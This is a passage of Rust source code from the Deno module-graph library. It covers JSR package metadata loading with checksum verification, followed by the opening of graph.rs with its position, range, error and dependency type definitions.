.pending_package_version_info_loads
.borrow()
.get(nv)
.cloned()
}
pub(crate) fn queue_load_package_info(
&self,
package_name: &str,
cache_setting: CacheSetting,
services: JsrMetadataStoreServices,
) {
let mut loads = self.pending_package_info_loads.borrow_mut();
if loads.contains_key(package_name) {
return; // already queued
}
// request to load
let specifier = services
.jsr_url_provider
.url()
.join(&format!("{}/meta.json", package_name))
.unwrap();
let fut = self.load_data(
specifier,
services,
cache_setting,
/* checksum */ None,
|content| {
let package_info: JsrPackageInfo = serde_json::from_slice(content)?;
Ok(Arc::new(package_info))
},
{
let package_name = package_name.to_string();
|e| JsrLoadError::PackageManifestLoad(package_name, Arc::new(e))
},
{
let package_name = package_name.to_string();
|| JsrLoadError::PackageNotFound(package_name)
},
);
loads.insert(package_name.to_string(), fut);
}
pub(crate) fn queue_load_package_version_info(
&self,
package_nv: &PackageNv,
cache_setting: CacheSetting,
maybe_locker: Option<&dyn Locker>,
services: JsrMetadataStoreServices,
) {
let mut loads = self.pending_package_version_info_loads.borrow_mut();
if loads.contains_key(package_nv) {
return; // already queued
}
let specifier = services
.jsr_url_provider
.url()
.join(&format!(
"{}/{}_meta.json",
package_nv.name, package_nv.version
))
.unwrap();
let maybe_expected_checksum = maybe_locker
.as_ref()
.and_then(|locker| locker.get_pkg_manifest_checksum(package_nv));
let should_compute_checksum =
maybe_expected_checksum.is_none() && maybe_locker.is_some();
let fut = self.load_data(
specifier,
services,
cache_setting,
// we won't have a checksum when not using a lockfile
maybe_expected_checksum,
move |content| {
let version_info: JsrPackageVersionInfo =
serde_json::from_slice(content)?;
let checksum_for_locker = should_compute_checksum.then(|| {
LoaderChecksum::new(
version_info
.lockfile_checksum
.clone()
.unwrap_or_else(|| LoaderChecksum::r#gen(content)),
)
});
Ok(PendingJsrPackageVersionInfoLoadItem {
checksum_for_locker,
info: Arc::new(version_info),
})
},
{
let package_nv = package_nv.clone();
|e| {
match e {
LoadError::ChecksumIntegrity(err) => {
// use a more specific variant in order to allow the
// cli to enhance this error message
JsrLoadError::PackageVersionManifestChecksumIntegrity(
Box::new(package_nv),
err,
)
}
LoadError::Other(err) => JsrLoadError::PackageVersionManifestLoad(
Box::new(package_nv),
err,
),
}
}
},
{
let package_nv = package_nv.clone();
|| JsrLoadError::PackageVersionNotFound(Box::new(package_nv))
},
);
loads.insert(package_nv.clone(), fut);
}
#[allow(clippy::too_many_arguments)]
fn load_data<T: Clone + 'static>(
&self,
specifier: ModuleSpecifier,
services: JsrMetadataStoreServices,
cache_setting: CacheSetting,
maybe_expected_checksum: Option<LoaderChecksum>,
handle_content: impl FnOnce(&[u8]) -> Result<T, serde_json::Error> + 'static,
create_failed_load_err: impl FnOnce(LoadError) -> JsrLoadError + 'static,
create_not_found_error: impl FnOnce() -> JsrLoadError + 'static,
) -> PendingResult<T> {
let fut = services.loader.load(
&specifier,
LoadOptions {
in_dynamic_branch: false,
was_dynamic_root: false,
cache_setting,
maybe_checksum: maybe_expected_checksum,
},
);
let fut = spawn(
services.executor,
async move {
let data = match fut.await {
Ok(data) => data,
Err(err) => return Err(create_failed_load_err(err)),
};
match data {
Some(LoadResponse::Module { content, .. }) => {
handle_content(&content).map_err(|e| {
create_failed_load_err(LoadError::Other(Arc::new(e)))
})
}
Some(LoadResponse::Redirect { specifier }) => {
Err(JsrLoadError::RedirectInPackage(specifier))
}
_ => Err(create_not_found_error()),
}
}
.boxed_local(),
);
fut.shared_local()
}
}
| rust | MIT | 200a22dbd56b311d490ad00bed57fce34538598e | 2026-01-04T20:22:02.257944Z | false |
denoland/deno_graph | https://github.com/denoland/deno_graph/blob/200a22dbd56b311d490ad00bed57fce34538598e/src/graph.rs | src/graph.rs | // Copyright 2018-2024 the Deno authors. MIT license.
use crate::ReferrerImports;
use crate::analysis::DependencyDescriptor;
use crate::analysis::DynamicArgument;
use crate::analysis::DynamicDependencyKind;
use crate::analysis::DynamicTemplatePart;
use crate::analysis::ImportAttributes;
use crate::analysis::ModuleAnalyzer;
use crate::analysis::ModuleInfo;
use crate::analysis::SpecifierWithRange;
use crate::analysis::StaticDependencyKind;
use crate::analysis::TypeScriptReference;
use crate::analysis::TypeScriptTypesResolutionMode;
use crate::collections::SeenPendingCollection;
use crate::jsr::JsrMetadataStore;
use crate::jsr::JsrMetadataStoreServices;
use crate::jsr::PendingJsrPackageVersionInfoLoadItem;
use crate::jsr::PendingResult;
use crate::packages::JsrVersionResolver;
use crate::packages::NewestDependencyDate;
use crate::module_specifier::ModuleSpecifier;
use crate::module_specifier::SpecifierError;
use crate::module_specifier::is_fs_root_specifier;
use crate::module_specifier::resolve_import;
use crate::packages::JsrPackageInfo;
use crate::packages::JsrPackageVersionInfo;
use crate::packages::PackageSpecifiers;
use crate::rt::Executor;
use crate::source::*;
use crate::MediaType;
use boxed_error::Boxed;
use deno_error::JsError;
use deno_error::JsErrorBox;
use deno_error::JsErrorClass;
use deno_media_type::encoding::BOM_CHAR;
use deno_media_type::encoding::DecodedArcSourceDetailKind;
use deno_semver::RangeSetOrTag;
use deno_semver::SmallStackString;
use deno_semver::StackString;
use deno_semver::Version;
use deno_semver::VersionReq;
use deno_semver::jsr::JsrDepPackageReq;
use deno_semver::jsr::JsrPackageNvReference;
use deno_semver::jsr::JsrPackageReqReference;
use deno_semver::npm::NpmPackageNvReference;
use deno_semver::npm::NpmPackageReqReference;
use deno_semver::package::PackageNv;
use deno_semver::package::PackageNvReference;
use deno_semver::package::PackageReq;
use deno_semver::package::PackageReqReferenceParseError;
use deno_semver::package::PackageSubPath;
use futures::FutureExt;
use futures::future::LocalBoxFuture;
use futures::stream::FuturesOrdered;
use futures::stream::FuturesUnordered;
use futures::stream::StreamExt;
use indexmap::IndexMap;
use indexmap::IndexSet;
use serde::Deserialize;
use serde::Serialize;
use serde::Serializer;
use serde::ser::SerializeSeq;
use serde::ser::SerializeStruct;
use serde::ser::SerializeTuple;
use std::borrow::Cow;
use std::cell::RefCell;
use std::cmp::Ordering;
use std::collections::BTreeMap;
use std::collections::BTreeSet;
use std::collections::HashMap;
use std::collections::HashSet;
use std::collections::VecDeque;
use std::fmt;
use std::path::Path;
use std::rc::Rc;
use std::sync::Arc;
use std::time::SystemTime;
use sys_traits::FileType;
use sys_traits::FsDirEntry;
use thiserror::Error;
use url::Url;
use wasm::wasm_module_to_dts;
#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize, Hash)]
pub struct Position {
/// The 0-indexed line index.
pub line: usize,
/// The 0-indexed character index.
pub character: usize,
}
impl std::fmt::Display for Position {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
write!(f, "{}:{}", self.line + 1, self.character + 1)
}
}
impl PartialOrd for Position {
fn partial_cmp(&self, other: &Self) -> Option<Ordering> {
Some(self.cmp(other))
}
}
impl Ord for Position {
fn cmp(&self, other: &Self) -> Ordering {
match self.line.cmp(&other.line) {
Ordering::Equal => self.character.cmp(&other.character),
Ordering::Greater => Ordering::Greater,
Ordering::Less => Ordering::Less,
}
}
}
impl Position {
pub fn new(line: usize, character: usize) -> Self {
Self { line, character }
}
pub fn zeroed() -> Self {
Self {
line: 0,
character: 0,
}
}
#[cfg(feature = "swc")]
pub fn from_source_pos(
pos: deno_ast::SourcePos,
text_info: &deno_ast::SourceTextInfo,
) -> Self {
let line_and_column_index = text_info.line_and_column_index(pos);
Self {
line: line_and_column_index.line_index,
character: line_and_column_index.column_index,
}
}
#[cfg(feature = "swc")]
pub fn as_source_pos(
&self,
text_info: &deno_ast::SourceTextInfo,
) -> deno_ast::SourcePos {
text_info.loc_to_source_pos(deno_ast::LineAndColumnIndex {
line_index: self.line,
column_index: self.character,
})
}
}
#[derive(Clone, Copy, Debug, Eq, PartialEq, Deserialize, Hash)]
pub struct PositionRange {
#[serde(default = "Position::zeroed")]
pub start: Position,
#[serde(default = "Position::zeroed")]
pub end: Position,
}
impl PositionRange {
pub fn zeroed() -> Self {
Self {
start: Position::zeroed(),
end: Position::zeroed(),
}
}
/// Determines if a given position is within the range.
pub fn includes(&self, position: Position) -> bool {
(position >= self.start) && (position <= self.end)
}
#[cfg(feature = "swc")]
pub fn from_source_range(
range: deno_ast::SourceRange,
text_info: &deno_ast::SourceTextInfo,
) -> Self {
Self {
start: Position::from_source_pos(range.start, text_info),
end: Position::from_source_pos(range.end, text_info),
}
}
#[cfg(feature = "swc")]
pub fn as_source_range(
&self,
text_info: &deno_ast::SourceTextInfo,
) -> deno_ast::SourceRange {
deno_ast::SourceRange::new(
self.start.as_source_pos(text_info),
self.end.as_source_pos(text_info),
)
}
}
// Custom serialization to serialize to an array. Interestingly we
// don't need to implement custom deserialization logic that does
// the same thing, and serde_json will handle it fine.
impl Serialize for PositionRange {
fn serialize<S>(&self, serializer: S) -> Result<S::Ok, S::Error>
where
S: Serializer,
{
struct PositionSerializer<'a>(&'a Position);
impl Serialize for PositionSerializer<'_> {
fn serialize<S>(&self, serializer: S) -> Result<S::Ok, S::Error>
where
S: Serializer,
{
let mut seq = serializer.serialize_tuple(2)?;
seq.serialize_element(&self.0.line)?;
seq.serialize_element(&self.0.character)?;
seq.end()
}
}
let mut seq = serializer.serialize_tuple(2)?;
seq.serialize_element(&PositionSerializer(&self.start))?;
seq.serialize_element(&PositionSerializer(&self.end))?;
seq.end()
}
}
#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize, Hash)]
pub struct Range {
#[serde(skip_serializing)]
pub specifier: ModuleSpecifier,
#[serde(flatten, serialize_with = "serialize_position")]
pub range: PositionRange,
#[serde(default, skip_serializing)]
pub resolution_mode: Option<ResolutionMode>,
}
fn serialize_position<S: Serializer>(
range: &PositionRange,
serializer: S,
) -> Result<S::Ok, S::Error> {
let mut seq = serializer.serialize_struct("PositionRange", 2)?;
seq.serialize_field("start", &range.start)?;
seq.serialize_field("end", &range.end)?;
seq.end()
}
impl fmt::Display for Range {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
write!(f, "{}:{}", self.specifier, self.range.start)
}
}
impl Range {
/// Determines if a given position is within the range.
pub fn includes(&self, position: Position) -> bool {
self.range.includes(position)
}
}
#[derive(Debug, Clone, Error, JsError)]
pub enum JsrLoadError {
#[class(type)]
#[error(
"Unsupported checksum in JSR package manifest. Maybe try upgrading deno?"
)]
UnsupportedManifestChecksum,
#[class(inherit)]
#[error(transparent)]
ContentChecksumIntegrity(ChecksumIntegrityError),
#[class(generic)]
#[error(
"Loader should never return an external specifier for a jsr: specifier content load."
)]
ContentLoadExternalSpecifier,
#[class(inherit)]
#[error(transparent)]
ContentLoad(Arc<LoadError>),
#[class(inherit)]
#[error("JSR package manifest for '{}' failed to load. {:#}", .0, .1)]
PackageManifestLoad(String, #[inherit] Arc<LoadError>),
#[class("NotFound")]
#[error("JSR package not found: {}", .0)]
PackageNotFound(String),
#[class("NotFound")]
#[error("JSR package version not found: {}", .0)]
PackageVersionNotFound(Box<PackageNv>),
#[class(inherit)]
#[error("JSR package version manifest for '{}' failed to load: {:#}", .0, .1)]
PackageVersionManifestLoad(Box<PackageNv>, #[inherit] Arc<dyn JsErrorClass>),
#[class(inherit)]
#[error("JSR package version manifest for '{}' failed to load: {:#}", .0, .1)]
PackageVersionManifestChecksumIntegrity(
Box<PackageNv>,
#[inherit] ChecksumIntegrityError,
),
#[class(inherit)]
#[error(transparent)]
PackageFormat(JsrPackageFormatError),
#[class(inherit)]
#[error(transparent)]
PackageReqNotFound(JsrPackageReqNotFoundError),
#[class(generic)]
#[error("Redirects in the JSR registry are not supported (redirected to '{}')", .0)]
RedirectInPackage(ModuleSpecifier),
#[class("NotFound")]
#[error("Unknown export '{}' for '{}'.\n Package exports:\n{}", export_name, .nv, .exports.iter().map(|e| format!(" * {}", e)).collect::<Vec<_>>().join("\n"))]
UnknownExport {
nv: Box<PackageNv>,
export_name: String,
exports: Vec<String>,
},
}
#[derive(Error, Debug, Clone, JsError)]
#[class("NotFound")]
#[error("Could not find version of '{}' that matches specified version constraint '{}'{}", req.name, req.version_req, newest_dependency_date.map(|v| format!("\n\nA newer matching version was found, but it was not used because it was newer than the specified minimum dependency date of {}", v)).unwrap_or_else(String::new))]
pub struct JsrPackageReqNotFoundError {
pub req: PackageReq,
pub newest_dependency_date: Option<NewestDependencyDate>,
}
#[derive(Error, Debug, Clone, JsError)]
#[class(type)]
pub enum JsrPackageFormatError {
#[error(transparent)]
JsrPackageParseError(PackageReqReferenceParseError),
#[error("Version tag not supported in jsr specifiers ('{}').{}",
.tag,
match .tag.strip_prefix('v').and_then(|v| VersionReq::parse_from_specifier(v).ok().map(|s| s.tag().is_none())).unwrap_or(false) {
true => " Remove leading 'v' before version.",
false => ""
}
)]
VersionTagNotSupported { tag: SmallStackString },
}
#[derive(Debug, Clone, Error, JsError)]
pub enum NpmLoadError {
#[class(type)]
#[error("npm specifiers are not supported in this environment")]
NotSupportedEnvironment,
#[class(inherit)]
#[error(transparent)]
PackageReqResolution(Arc<dyn JsErrorClass>),
#[class(inherit)]
#[error(transparent)]
PackageReqReferenceParse(PackageReqReferenceParseError),
#[class(inherit)]
#[error(transparent)]
RegistryInfo(Arc<dyn JsErrorClass>),
}
#[derive(Debug, Error, Clone, JsError)]
pub enum ModuleLoadError {
#[class(inherit)]
#[error(transparent)]
HttpsChecksumIntegrity(ChecksumIntegrityError),
#[class(inherit)]
#[error(transparent)]
Decode(Arc<DecodeError>),
#[class(inherit)]
#[error(transparent)]
Loader(Arc<LoadError>),
#[class(inherit)]
#[error(transparent)]
Jsr(#[from] JsrLoadError),
#[class(inherit)]
#[error(transparent)]
Npm(#[from] NpmLoadError),
#[class(generic)]
#[error("Too many redirects.")]
TooManyRedirects,
}
#[derive(Debug, JsError)]
#[class(inherit)]
pub struct DecodeError {
/// Modified time of the underlying file. Used to tell whether
/// the file should be reloaded.
pub mtime: Option<SystemTime>,
#[inherit]
pub err: std::io::Error,
}
impl std::error::Error for DecodeError {
fn source(&self) -> Option<&(dyn std::error::Error + 'static)> {
self.err.source()
}
}
impl std::fmt::Display for DecodeError {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
self.err.fmt(f)
}
}
#[derive(Debug, Clone, JsError, Boxed)]
pub struct ModuleError(pub Box<ModuleErrorKind>);
impl ModuleError {
pub fn specifier(&self) -> &ModuleSpecifier {
self.as_kind().specifier()
}
pub fn maybe_referrer(&self) -> Option<&Range> {
self.as_kind().maybe_referrer()
}
/// Gets the mtime (if able) of the loaded file that caused this error.
pub fn mtime(&self) -> Option<SystemTime> {
self.as_kind().mtime()
}
/// Converts the error into a string along with the range related to the error.
pub fn to_string_with_range(&self) -> String {
self.as_kind().to_string_with_range()
}
}
#[derive(Debug, Clone, JsError)]
pub enum ModuleErrorKind {
#[class(inherit)]
Load {
specifier: ModuleSpecifier,
maybe_referrer: Option<Range>,
#[inherit]
err: ModuleLoadError,
},
#[class("NotFound")]
Missing {
specifier: ModuleSpecifier,
maybe_referrer: Option<Range>,
},
#[class("NotFound")]
MissingDynamic {
specifier: ModuleSpecifier,
referrer: Range,
},
#[class(inherit)]
Parse {
specifier: ModuleSpecifier,
/// Modified time of the underlying file. Used to tell whether
/// the file should be reloaded.
mtime: Option<SystemTime>,
#[inherit]
diagnostic: Arc<JsErrorBox>,
},
#[class(inherit)]
WasmParse {
specifier: ModuleSpecifier,
/// Modified time of the underlying file. Used to tell whether
/// the file should be reloaded.
mtime: Option<SystemTime>,
#[inherit]
err: wasm_dep_analyzer::ParseError,
},
#[class(type)]
UnsupportedMediaType {
specifier: ModuleSpecifier,
media_type: MediaType,
maybe_referrer: Option<Range>,
},
#[class(syntax)]
InvalidTypeAssertion {
specifier: ModuleSpecifier,
referrer: Range,
actual_media_type: MediaType,
expected_media_type: MediaType,
},
#[class(type)]
UnsupportedImportAttributeType {
specifier: ModuleSpecifier,
referrer: Range,
kind: String,
},
#[class(type)]
UnsupportedModuleTypeForSourcePhaseImport {
specifier: ModuleSpecifier,
referrer: Range,
actual_media_type: MediaType,
actual_attribute_type: Option<String>,
},
}
impl ModuleErrorKind {
pub fn specifier(&self) -> &ModuleSpecifier {
match self {
Self::Load { specifier, .. }
| Self::Parse { specifier, .. }
| Self::WasmParse { specifier, .. }
| Self::UnsupportedMediaType { specifier, .. }
| Self::Missing { specifier, .. }
| Self::MissingDynamic { specifier, .. }
| Self::InvalidTypeAssertion { specifier, .. }
| Self::UnsupportedImportAttributeType { specifier, .. } => specifier,
Self::UnsupportedModuleTypeForSourcePhaseImport { specifier, .. } => {
specifier
}
}
}
pub fn maybe_referrer(&self) -> Option<&Range> {
match self {
Self::Load { maybe_referrer, .. }
| Self::Missing { maybe_referrer, .. } => maybe_referrer.as_ref(),
Self::UnsupportedMediaType { maybe_referrer, .. } => {
maybe_referrer.as_ref()
}
Self::Parse { .. } => None,
Self::WasmParse { .. } => None,
Self::MissingDynamic { referrer, .. }
| Self::InvalidTypeAssertion { referrer, .. }
| Self::UnsupportedImportAttributeType { referrer, .. }
| Self::UnsupportedModuleTypeForSourcePhaseImport { referrer, .. } => {
Some(referrer)
}
}
}
/// Gets the mtime (if able) of the loaded file that caused this error.
pub fn mtime(&self) -> Option<SystemTime> {
match self {
Self::Parse { mtime, .. } | Self::WasmParse { mtime, .. } => *mtime,
Self::Load { err, .. } => match err {
ModuleLoadError::Decode(decode_error) => decode_error.mtime,
ModuleLoadError::HttpsChecksumIntegrity { .. }
| ModuleLoadError::Loader { .. }
| ModuleLoadError::Jsr { .. }
| ModuleLoadError::Npm { .. }
| ModuleLoadError::TooManyRedirects => None,
},
Self::Missing { .. }
| Self::MissingDynamic { .. }
| Self::UnsupportedMediaType { .. }
| Self::InvalidTypeAssertion { .. }
| Self::UnsupportedImportAttributeType { .. }
| Self::UnsupportedModuleTypeForSourcePhaseImport { .. } => None,
}
}
/// Converts the error into a string along with the range related to the error.
pub fn to_string_with_range(&self) -> String {
if let Some(range) = self.maybe_referrer() {
format!("{self:#}\n at {range}")
} else {
format!("{self:#}")
}
}
}
impl std::error::Error for ModuleErrorKind {
fn source(&self) -> Option<&(dyn std::error::Error + 'static)> {
match self {
Self::Load { err, .. } => Some(err),
Self::Missing { .. }
| Self::MissingDynamic { .. }
| Self::Parse { .. }
| Self::WasmParse { .. }
| Self::UnsupportedMediaType { .. }
| Self::InvalidTypeAssertion { .. }
| Self::UnsupportedImportAttributeType { .. }
| Self::UnsupportedModuleTypeForSourcePhaseImport { .. } => None,
}
}
}
impl fmt::Display for ModuleErrorKind {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
match self {
Self::Load { err, .. } => err.fmt(f),
Self::Parse { diagnostic, .. } => write!(
f,
"The module's source code could not be parsed: {diagnostic}"
),
Self::WasmParse { specifier, err, .. } => write!(
f,
"The Wasm module could not be parsed: {err}\n Specifier: {specifier}"
),
Self::UnsupportedMediaType {
specifier,
media_type: MediaType::Json,
..
} => write!(
f,
"Expected a JavaScript or TypeScript module, but identified a Json module. Consider importing Json modules with an import attribute with the type of \"json\".\n Specifier: {specifier}"
),
Self::UnsupportedMediaType {
specifier,
media_type: MediaType::Cjs | MediaType::Cts,
..
} if specifier.scheme() != "file" => write!(
f,
"Remote CJS modules are not supported.\n Specifier: {specifier}"
),
Self::UnsupportedMediaType {
specifier,
media_type,
..
} => write!(
f,
"Expected a JavaScript or TypeScript module, but identified a {media_type} module. Importing these types of modules is currently not supported.\n Specifier: {specifier}"
),
Self::Missing { specifier, .. } => {
write!(f, "Module not found \"{specifier}\".")
}
Self::MissingDynamic { specifier, .. } => {
write!(f, "Dynamic import not found \"{specifier}\".")
}
Self::InvalidTypeAssertion {
specifier,
actual_media_type: MediaType::Json,
expected_media_type,
..
} => write!(
f,
"Expected a {expected_media_type} module, but identified a Json module. Consider importing Json modules with an import attribute with the type of \"json\".\n Specifier: {specifier}"
),
Self::InvalidTypeAssertion {
specifier,
actual_media_type,
expected_media_type,
..
} => write!(
f,
"Expected a {expected_media_type} module, but identified a {actual_media_type} module.\n Specifier: {specifier}"
),
Self::UnsupportedImportAttributeType {
specifier, kind, ..
} => write!(
f,
"The import attribute type of \"{kind}\" is unsupported.\n Specifier: {specifier}"
),
Self::UnsupportedModuleTypeForSourcePhaseImport {
specifier,
actual_media_type,
actual_attribute_type: None,
..
} => write!(
f,
"Importing {actual_media_type} modules at source phase is unsupported.\n Specifier: {specifier}"
),
Self::UnsupportedModuleTypeForSourcePhaseImport {
specifier,
actual_media_type,
actual_attribute_type: Some(actual_attribute_type),
..
} => write!(
f,
"Importing {actual_media_type} modules with {{ type: \"{actual_attribute_type}\" }} at source phase is unsupported.\n Specifier: {specifier}"
),
}
}
}
#[derive(Debug, Clone, JsError)]
pub enum ModuleGraphError {
#[class(inherit)]
ModuleError(ModuleError),
#[class(inherit)]
ResolutionError(ResolutionError),
#[class(inherit)]
TypesResolutionError(ResolutionError),
}
impl ModuleGraphError {
pub fn as_module_error_kind(&self) -> Option<&ModuleErrorKind> {
match self {
Self::ModuleError(err) => Some(err.as_kind()),
_ => None,
}
}
fn for_resolution_kind(kind: ResolutionKind, error: ResolutionError) -> Self {
match kind {
ResolutionKind::Execution => Self::ResolutionError(error),
ResolutionKind::Types => Self::TypesResolutionError(error),
}
}
/// Converts the error into a string along with the range related to the error.
///
/// We don't include the range in the error messages by default because they're
/// not useful in cases like the LSP where the range is given by the editor itself.
pub fn to_string_with_range(&self) -> String {
match self {
ModuleGraphError::ModuleError(err) => err.to_string_with_range(),
ModuleGraphError::ResolutionError(err)
| ModuleGraphError::TypesResolutionError(err) => {
err.to_string_with_range()
}
}
}
pub fn maybe_range(&self) -> Option<&Range> {
match self {
Self::ModuleError(err) => err.maybe_referrer(),
Self::ResolutionError(err) | Self::TypesResolutionError(err) => {
Some(err.range())
}
}
}
}
impl std::error::Error for ModuleGraphError {
fn source(&self) -> Option<&(dyn std::error::Error + 'static)> {
match self {
Self::ModuleError(err) => Some(err),
Self::ResolutionError(err) | Self::TypesResolutionError(err) => Some(err),
}
}
}
impl fmt::Display for ModuleGraphError {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
match self {
Self::ModuleError(err) => err.fmt(f),
Self::ResolutionError(err) => err.fmt(f),
Self::TypesResolutionError(err) => {
f.write_str("Failed resolving types. ")?;
err.fmt(f)
}
}
}
}
#[derive(Debug, Clone, JsError)]
#[class(type)]
pub enum ResolutionError {
InvalidDowngrade {
specifier: ModuleSpecifier,
range: Range,
},
InvalidJsrHttpsTypesImport {
specifier: ModuleSpecifier,
range: Range,
},
InvalidLocalImport {
specifier: ModuleSpecifier,
range: Range,
},
InvalidSpecifier {
error: SpecifierError,
range: Range,
},
ResolverError {
error: Arc<ResolveError>,
specifier: String,
range: Range,
},
}
impl ResolutionError {
/// Return a reference to the range that the error applies to.
pub fn range(&self) -> &Range {
match self {
Self::InvalidDowngrade { range, .. }
| Self::InvalidJsrHttpsTypesImport { range, .. }
| Self::InvalidLocalImport { range, .. }
| Self::InvalidSpecifier { range, .. }
| Self::ResolverError { range, .. } => range,
}
}
/// Converts the error into a string along with the range related to the error.
pub fn to_string_with_range(&self) -> String {
format!("{}\n at {}", self, self.range())
}
}
impl std::error::Error for ResolutionError {
fn source(&self) -> Option<&(dyn std::error::Error + 'static)> {
match self {
Self::InvalidDowngrade { .. }
| Self::InvalidJsrHttpsTypesImport { .. }
| Self::InvalidLocalImport { .. } => None,
Self::InvalidSpecifier { error, .. } => Some(error),
Self::ResolverError { error, .. } => Some(error.as_ref()),
}
}
}
impl PartialEq for ResolutionError {
fn eq(&self, other: &Self) -> bool {
match (self, other) {
(
Self::ResolverError {
specifier: a,
range: a_range,
..
},
Self::ResolverError {
specifier: b,
range: b_range,
..
},
) => a == b && a_range == b_range,
(
Self::InvalidDowngrade {
specifier: a,
range: a_range,
..
},
Self::InvalidDowngrade {
specifier: b,
range: b_range,
..
},
)
| (
Self::InvalidJsrHttpsTypesImport {
specifier: a,
range: a_range,
..
},
Self::InvalidJsrHttpsTypesImport {
specifier: b,
range: b_range,
..
},
)
| (
Self::InvalidLocalImport {
specifier: a,
range: a_range,
..
},
Self::InvalidLocalImport {
specifier: b,
range: b_range,
..
},
) => a == b && a_range == b_range,
(
Self::InvalidSpecifier {
error: a,
range: a_range,
..
},
Self::InvalidSpecifier {
error: b,
range: b_range,
..
},
) => a == b && a_range == b_range,
_ => false,
}
}
}
impl Eq for ResolutionError {}
impl fmt::Display for ResolutionError {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
match self {
Self::InvalidDowngrade { specifier, .. } => write!(
f,
"Modules imported via https are not allowed to import http modules.\n Importing: {specifier}"
),
Self::InvalidJsrHttpsTypesImport { specifier, .. } => write!(
f,
"Importing JSR packages via HTTPS specifiers for type checking is not supported for performance reasons. If you would like types, import via a `jsr:` specifier instead or else use a non-statically analyzable dynamic import.\n Importing: {specifier}"
),
Self::InvalidLocalImport { specifier, .. } => write!(
f,
"Remote modules are not allowed to import local modules. Consider using a dynamic import instead.\n Importing: {specifier}"
),
Self::ResolverError { error, .. } => error.fmt(f),
Self::InvalidSpecifier { error, .. } => error.fmt(f),
}
}
}
#[derive(Debug, Clone, PartialEq, Eq)]
pub struct ResolutionResolved {
/// Specifier to.
pub specifier: ModuleSpecifier,
/// Referrer range.
pub range: Range,
}
#[derive(Debug, Clone, PartialEq, Eq)]
pub enum Resolution {
None,
Ok(Box<ResolutionResolved>),
Err(Box<ResolutionError>),
}
impl Resolution {
pub fn from_resolve_result(
result: Result<ModuleSpecifier, ResolveError>,
specifier_text: &str,
range: Range,
) -> Self {
match result {
Ok(specifier) => {
Resolution::Ok(Box::new(ResolutionResolved { specifier, range }))
}
Err(err) => {
let resolution_error =
if let ResolveError::Specifier(specifier_error) = err {
ResolutionError::InvalidSpecifier {
error: specifier_error.clone(),
range,
}
} else {
ResolutionError::ResolverError {
error: Arc::new(err),
specifier: specifier_text.to_string(),
range,
}
};
Self::Err(Box::new(resolution_error))
}
}
}
pub fn includes(&self, position: Position) -> Option<&Range> {
match self {
Self::Ok(resolution) if resolution.range.includes(position) => {
Some(&resolution.range)
}
Self::Err(err) => {
let range = err.range();
if range.includes(position) {
Some(range)
} else {
None
}
}
_ => None,
}
}
pub fn is_none(&self) -> bool {
matches!(self, Self::None)
}
pub fn maybe_specifier(&self) -> Option<&ModuleSpecifier> {
self.ok().map(|r| &r.specifier)
}
pub fn maybe_range(&self) -> Option<&Range> {
match self {
Resolution::None => None,
Resolution::Ok(r) => Some(&r.range),
Resolution::Err(e) => Some(e.range()),
}
}
pub fn ok(&self) -> Option<&ResolutionResolved> {
if let Resolution::Ok(resolved) = self {
Some(&**resolved)
} else {
None
}
}
pub fn err(&self) -> Option<&ResolutionError> {
if let Resolution::Err(err) = self {
Some(&**err)
} else {
None
}
}
}
impl Default for Resolution {
fn default() -> Self {
Self::None
}
}
fn is_false(v: &bool) -> bool {
!v
}
#[derive(Clone, Copy, Debug, Serialize, Eq, PartialEq)]
#[serde(rename_all = "camelCase")]
pub enum ImportKind {
/// `import`/`export`
Es,
/// `import source`
EsSource,
/// `require`
Require,
/// `import type`/`export type`
TsType,
/// `declare module "@tanstack/react-router" {}`
TsModuleAugmentation,
/// `/// <reference path="..." />`
TsReferencePath,
/// `/// <reference types="..." />`
TsReferenceTypes,
/// `/** @jsxImportSource ... */`
JsxImportSource,
/// `/** @typedef { import("./types").Pet } Pet */`
JsDoc,
}
impl ImportKind {
pub fn is_runtime(&self) -> bool {
match self {
ImportKind::Es
| ImportKind::EsSource
| ImportKind::Require
| ImportKind::JsxImportSource => true,
ImportKind::TsType
| ImportKind::TsModuleAugmentation
| ImportKind::TsReferencePath
| ImportKind::TsReferenceTypes
| ImportKind::JsDoc => false,
}
}
pub fn is_source_phase(&self) -> bool {
match self {
ImportKind::EsSource => true,
ImportKind::Es
| ImportKind::Require
| ImportKind::JsxImportSource
| ImportKind::TsType
| ImportKind::TsModuleAugmentation
| ImportKind::TsReferencePath
| ImportKind::TsReferenceTypes
| ImportKind::JsDoc => false,
}
}
fn is_es(&self) -> bool {
matches!(self, ImportKind::Es)
}
}
#[derive(Clone, Debug, Eq, PartialEq, Serialize)]
#[serde(rename_all = "camelCase")]
pub struct Import {
pub specifier: String,
#[serde(skip_serializing_if = "ImportKind::is_es")]
pub kind: ImportKind,
#[serde(rename = "range")]
pub specifier_range: Range,
#[serde(skip_serializing_if = "is_false")]
pub is_dynamic: bool,
/// If this is an import for only side effects (ex. `import './load.js';`)
#[serde(skip_serializing)]
pub is_side_effect: bool,
// Don't include attributes in `deno info --json` until someone has a need.
// Attribute error strings eventually will be included in a separate `Import::errors`, however.
#[serde(skip_serializing)]
pub attributes: ImportAttributes,
}
#[derive(Debug, Default, Clone, Eq, PartialEq, Serialize)]
#[serde(rename_all = "camelCase")]
pub struct Dependency {
#[serde(rename = "code", skip_serializing_if = "Resolution::is_none")]
pub maybe_code: Resolution,
#[serde(rename = "type", skip_serializing_if = "Resolution::is_none")]
pub maybe_type: Resolution,
#[serde(skip_serializing)]
pub maybe_deno_types_specifier: Option<String>,
#[serde(skip_serializing_if = "is_false")]
pub is_dynamic: bool,
// todo(dsherret): rename to attributeType in 3.0
#[serde(rename = "assertionType", skip_serializing_if = "Option::is_none")]
pub maybe_attribute_type: Option<String>,
// TODO(nayeemrmn): Replace `maybe_attribute_type` with this in the serialization
// for 3.0.
#[serde(skip_serializing)]
pub imports: Vec<Import>,
}
impl Dependency {
/// Optionally return the module specifier in the module graph that points to
/// the "code" dependency in the graph.
pub fn get_code(&self) -> Option<&ModuleSpecifier> {
self.maybe_code.maybe_specifier()
}
/// Optionally return the module specifier in the module graph that points to
